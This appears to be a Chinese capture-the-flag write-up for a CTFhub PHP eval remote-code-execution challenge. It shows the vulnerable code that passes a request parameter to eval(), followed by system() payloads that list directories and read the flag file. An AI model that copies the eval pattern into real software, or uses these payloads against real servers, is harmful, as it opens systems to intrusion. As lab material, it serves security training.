CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
努力成为AK大王2 分钟前
Spring Bean 作用域与生命周期
java·后端·spring
希望永不加班6 分钟前
SpringBoot 消息幂等性设计:防重复消费
java·开发语言·spring boot·后端·spring
我是一颗柠檬7 分钟前
【JDK8新特性】CompletableFuture异步编程Day10
java·开发语言·后端·intellij-idea
a23121217 分钟前
从零搭建Spring Ai多智能体后端应用
java·运维·微服务·多智能体·后端开发·spring ai
Yeats_Liao10 分钟前
5:Servlet程序-Java Web
java·后端·设计
小马爱打代码14 分钟前
Spring源码 第八篇:Spring 5 源码深度拆解 - Spring 资源加载与 Environment 环境体系
java·后端·spring
czt_java19 分钟前
线程的几种状态
java·开发语言
y = xⁿ25 分钟前
JUC八股:线程池及ThreadLocal
java·开发语言
月落归舟27 分钟前
Spring Bean作用域以及生命周期
java·spring
01_ice29 分钟前
Java多态
java·开发语言
热门推荐
01GitHub 镜像站点02【AI】2026 年具身智能模型和世界模型总结03Codex 接入 DeepSeek API 完整配置文档04DeepSeek V4 + Claude Code thinking mode 400 错误修复方案05【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07CC-Switch & Claude 基于 Linux 服务器安装使用指南082026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot09CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)10Windows端Codex接入第三方模型(DeekSeek,BaiLian)